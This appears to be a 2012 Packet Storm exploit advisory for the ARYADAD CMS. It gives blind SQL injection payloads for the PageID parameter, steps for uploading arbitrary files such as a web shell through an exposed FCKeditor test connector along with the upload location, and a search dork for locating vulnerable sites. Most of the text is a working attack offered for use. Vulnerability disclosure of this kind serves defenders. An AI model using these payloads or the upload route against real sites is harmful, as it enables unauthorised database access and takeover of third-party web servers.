ARYADAD suffers from remote blind SQL injection and shell upload vulnerabilities.
8bf29ac61d0e5517e96243fe0a2a1018#
# Title : ARYADAD Multi Vulnerability
# Author : Red Security TEAM
# Date : 21/01/2012
# Vendor : http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork : Powered by ARYADAD Corporation
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# I : Blind SQL Injection Vulnerability
# True : http://server/Default.aspx?PageID=117' and 1-1 = '0
# False : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II : File Upload Vulnerability
# 1. Go to : /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
#
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!